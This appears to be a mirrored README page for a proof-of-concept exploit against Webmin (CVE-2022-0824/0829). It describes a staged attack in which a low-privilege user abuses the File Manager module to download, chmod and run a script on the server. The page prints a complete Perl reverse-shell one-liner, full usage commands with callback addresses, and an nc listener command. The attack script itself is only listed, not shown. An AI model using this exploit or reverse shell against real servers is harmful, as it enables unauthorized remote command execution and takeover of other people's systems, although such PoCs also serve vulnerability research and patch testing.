来源

关联漏洞

描述

CVE-2022-0824, CVE-2022-0829, File Manger privilege exploit

介绍

# WebminRCE-exploit
CVE-2022-0824, CVE-2022-0829 - File Manger privilege exploit

Vulnerable application to test this PoC can be found [here](https://hub.docker.com/r/gokul2/cve-2022-0824) as a docker image.  <br/>
Prerequisites: <br/>
- Python3
 - Requests module
 
<h2>Description</h2>
<h3>Vulnerability</h3>
		Improper Access Control to Remote Code Execution
		Safe users (Unpriviledged user) can access File Manager module, which should be restricted by default.

<h3>Exploit Payload</h3>
		Use Improper Access control vulnerability to upload a cgi file into the webmin server.  
<h4>Stage 1 (Authentication)</h4>
		Authenticate and login to the server with a safe/less priviledged user.
<h4>Stage 2 (Download file into server)</h4>
		Make use of the vulnerable File Manager (/file-manager/http_download.cgi) module to download a perl script into the server.
		<br/>Perl Script to get a reverse shell access : <br/>
  
  
```PERL
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
<h4>Stage 3 (Modify permission) </h4>
Add executable permission to the file (/file-manager/chmod.cgi)

<h4> Stage 4 (Execute Command) </h4>
Simply call the uploaded file to execute the reverse shell script present inside same.

<h2>Usage directions : </h2>


```
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

```

<h2>Usage example: </h2>


```
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
```

```
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080
```

Username and Password are for safe users (non-priviledged)
Setup listener before running the script to get reverse shell connection.
```
$ nc -lvp <port>
```
Thanks to [@faisalfs10x](https://github.com/faisalfs10x)  for the exploit.

文件快照

 [4.0K]  /data/pocs/19005a3e95be6d57c5d6b935dc4bfd4615e2b9d4
├── [3.6K]  cve-2022-0824.py
└── [2.7K]  README.md

0 directories, 2 files

备注